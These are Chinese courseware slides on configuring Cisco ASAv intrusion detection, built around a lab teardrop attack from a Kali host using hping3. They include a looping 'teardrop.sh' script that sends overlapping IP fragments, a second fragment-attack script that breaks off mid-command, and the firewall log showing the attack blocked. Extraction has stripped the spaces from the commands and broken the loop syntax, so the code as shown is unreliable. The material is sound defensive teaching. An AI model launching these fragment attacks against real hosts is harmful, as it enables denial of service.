《计算机网络安全防护技术（第二版）》 课件 第2章-任务2.8 配置ASAv的入侵检测功能.pptx

第2章

防火墙技术与入侵防御技术;计算机网络中的防火墙可以将不安全的网络与需要保护的网络隔离开，并根据安全策略控制进出网络的数据和信息。如果把防火墙看作门卫，入侵检测或入侵防御系统（IDS或IPS）则可看作监视器，它可以时刻监视网络中是否有异常流量并及时阻断，进一步保护网络的安全。

本章以思科ASAv为例，介绍防火墙的基本操作与应用，以及简单IDS功能。本章案例拓扑如图2-0-1所示。;任务2.8配置ASAv的入侵检测功能;2.8.1观察IP分片和防御泪滴攻击;二、观看分片效果

使用下面的命令观看分片效果：

root@kali:~#ping-s2000-c1202.3.3.3

//位于DMZ区域，IP地址是172.16.2.1的WEB服务器经NAT转换后IP地址转换为202.3.3.3。

在R_DMZ路由器的g0/1接口抓包可以看到分片。这是因为2000大于以太网的MTU值1500，导致系统对载荷进行分片。

三、用hping3命令构造分片包

hping3的主要参数和用法如下：

默认使用TCP模式

-1使用ICMP模式

-2使用UDP模式

-p指定目的主机端口号

-i设置发送时间间隔，如-iu10表示发送时间间隔10微秒

-S设置SYN标志

-a设置源IP地址

-c设置发送数据包的个数（count）

-N设置IP包的ID

-t设置TTL值，默认是64

-x设置morefragments标志

-g设置Fragmentoffset

-C设置ICMP类型

-d设置载荷大小（datasize）;实验如下:

1.R_DMZ路由器的g0/1接口抓包。

2.在外网的kaliLinux主机上，执行以下命令：

root@kali:~#hping3202.3.3.3-1-x-d1000-N100-c1

root@kali:~#hping3202.3.3.3-1-d200-g1008-N100-c1

//-g1008表示第二个分片的偏移量是1008，这是因为第一个分片的大小是1000，第一个分片的ICMP包头长度是8，合计为1008。

这两条命令之间执行的时间间隔要短才能达到效果。方法是先依次执行这两条命令，此时不会有效果，然后再通过按上下键调用这两条命令，在尽可能短的时间间隔内，依次完成这两条命令的执行。

3.查看抓包结果，可观察到reply包。;四、进行泪滴攻击并观看防火墙的防范记录

ASA防火墙默认启用了基本威胁检测，即threat-detectionbasic-threat,可以阻拦泪滴攻击。具体实验如下：

1.在外网的KaliLinux主机上新建泪滴攻击脚本，查看脚本内容如下：

root@kali:~#catteardrop.sh

#!/bin/bash

for((i=100;i200;i++))

do

hping3202.3.3.3-1-x-d1000-N$i-c1

hping3202.3.3.3-1-d200-g400-N$i-c1

done

构造的数据包有两个分片，第二个分片的偏移量应该是1008，但循环语句中却将其设置成了400，故意造成两个分片有重叠。

2.执行该脚本，实施泪滴攻击，同时在R_DMZ路由器的g0/1接口上抓包。

root@kali:~#chmod+x./teardrop.sh

root@kali:~#./teardrop.sh

;3.泪滴攻击后，查看抓包的结果，发现抓不到相关的包。

4.在防火墙上查看日志，命令如下：

ciscoasa(config)#showlogging

可以看到：

%ASA-2-106020:DenyIPteardropfragment(size=208,offset=400)from202.2.2.30to202.3.3.3

说明防火墙已经成功阻挡了泪滴攻击。;2.8.2防范IP分片攻击;2.进行IP分片攻击，观看抓包效果。

（1）在外网的KaliLinux主机上新建IP分片攻击脚本，脚本仅以三个分片为例，不影响查看防御效果。查看脚本内容如下：

root@kali:~#morepingcs.sh

#!/bin/bash

hping3202.3.3.3-1-C0-x-d600-N100-c1

hping3202.3.3.3-1-C0-x-d200-g608-N100-c1

hping3202.3.3.3-1-C0-d